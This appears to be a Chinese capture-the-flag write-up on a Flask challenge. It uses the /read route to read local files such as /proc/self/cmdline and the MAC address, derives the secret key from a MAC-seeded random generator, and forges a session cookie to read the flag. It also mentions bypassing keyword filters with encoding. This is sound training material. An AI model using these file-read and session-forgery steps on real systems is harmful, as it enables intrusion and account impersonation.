1、打开环境,有个超链接readSomtthing,直接跳转到百度首页。
2、观察跳转URL,IP:PORT/read?url=https://baidu.com。结合提示,可能存在任意文件读取漏洞。
3、使用url= /proc/self/cmdline 读取当前进程对应的终端命令时,发现了app.py。审计代码:
# encoding:utf-8 import re, random, uuid, urllib from flask import Flask, session, request app = Flask(__name__) random.seed(uuid.getnode()) #用mac地址作为种子 app.config['SECRET_KEY'] = str(random.random() * 233) #根据上面的Mac地址,生成密钥。 app.debug = True @app.route('/') def index(): session['username'] = 'www-data' #当前用户 return 'Hello World! Read somethings' @app.route('/read') def read(): try: url = request.args.get('url') m = re.findall('^file.*', url, re.IGNORECASE) n = re.findall('flag', url, re.IGNORECASE) if m or n: return 'No Hack' res = urllib.urlopen(url) return res.read() except Exception as ex: print str(ex) return 'no response' @app.route('/flag') def flag(): if session and session['username'] == 'fuck': #需要让username = fuck,才会读取flag return open('/flag.txt').read() else: return 'Access denied' if __name__ == '__main__': app.run(debug=True, host="0.0.0.0")可以确定,当前用户是www-data,路由为/。当用户为fuck,路由为/flag时,可以读取flag。由此,需要进行session伪造。
4、session伪造必须要知道scret_key,代码里给出了方法:
random.seed(uuid.getnode()) #用mac地址作为种子 app.config['SECRET_KEY'] = str(random.random() * 233) #根据上面的Mac地址,生成密钥。根据url=/sys/class/net/eth0/address拿到mac地址:02:42:ac:02:16:63。开始生成scret_key(这里需要使用python2,因为这个题目的环境是2,生成密钥用3的话,长度会长一些,伪造结果不对):
import random random.seed(0x0242ac021663) #也可以转为十进制的2485376915043 print(str(random.random()*233))结果:10.937048099。
5、拿到scret_key之后,尝试对当前的session解密,看看对不对:
用户:www-data,说明密钥是正确的,开始伪造fuck的session:
刚开始用单引号报错,后来使用双引号正常出来session。替换、刷新、才出现flag。
6、/read路由过滤了flag、file关键字,也可以考虑编码绕过直接读取flag。
